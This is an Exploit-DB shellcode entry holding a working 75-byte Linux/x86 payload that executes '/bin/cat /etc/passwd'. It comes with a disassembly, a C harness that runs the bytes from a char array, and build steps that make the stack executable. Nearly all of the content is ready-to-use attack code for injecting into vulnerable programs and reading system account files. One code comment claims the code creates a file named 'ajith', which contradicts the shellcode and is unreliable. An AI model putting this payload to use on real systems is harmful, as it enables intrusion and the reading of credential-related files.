Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) Shellcode (75 bytes)

EDB-ID:

38116

CVE:

N/A

EDB Verified:

Author:

Ajith Kp

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2015-09-09

Vulnerable App: 
/*
---------------------------------------------------------------------------------------------------

# Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) - 75 bytes
# Tested in Zorin OS 10 x86
# Author: Ajith Kp

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

08048060 <.text>:
 8048060:	eb 1f                	jmp    0x8048081
 8048062:	5b                   	pop    %ebx
 8048063:	31 c0                	xor    %eax,%eax
 8048065:	88 43 0b             	mov    %al,0xb(%ebx)
 8048068:	88 43 18             	mov    %al,0x18(%ebx)
 804806b:	89 5b 19             	mov    %ebx,0x19(%ebx)
 804806e:	8d 4b 0c             	lea    0xc(%ebx),%ecx
 8048071:	89 4b 1d             	mov    %ecx,0x1d(%ebx)
 8048074:	89 43 21             	mov    %eax,0x21(%ebx)
 8048077:	b0 0b                	mov    $0xb,%al
 8048079:	8d 4b 19             	lea    0x19(%ebx),%ecx
 804807c:	8d 53 21             	lea    0x21(%ebx),%edx
 804807f:	cd 80                	int    $0x80
 8048081:	e8 dc ff ff ff       	call   0x8048062
 8048086:	2f                   	das    
 8048087:	2f                   	das    
 8048088:	2f                   	das    
 8048089:	2f                   	das    
 804808a:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 804808d:	2f                   	das    
 804808e:	63 61 74             	arpl   %sp,0x74(%ecx)
 8048091:	23 2f                	and    (%edi),%ebp
 8048093:	2f                   	das    
 8048094:	65 74 63             	gs je  0x80480fa
 8048097:	2f                   	das    
 8048098:	70 61                	jo     0x80480fb
 804809a:	73 73                	jae    0x804810f
 804809c:	77 64                	ja     0x8048102
 804809e:	23 41 4a             	and    0x4a(%ecx),%eax
 80480a1:	49                   	dec    %ecx
 80480a2:	54                   	push   %esp
 80480a3:	48                   	dec    %eax
 80480a4:	41                   	inc    %ecx
 80480a5:	4a                   	dec    %edx
 80480a6:	49                   	dec    %ecx
 80480a7:	54                   	push   %esp
 80480a8:	48                   	dec    %eax
 80480a9:	4b                   	dec    %ebx
 80480aa:	50                   	push   %eax
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o cat_etc_passwd cat_etc_passwd.c
$ execstack -s cat_etc_passwd
$ ./cat_etc_passwd

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50";
// It will create file named 'ajith' with permission 7775
void main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) sh;
	(int)(*func)();
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services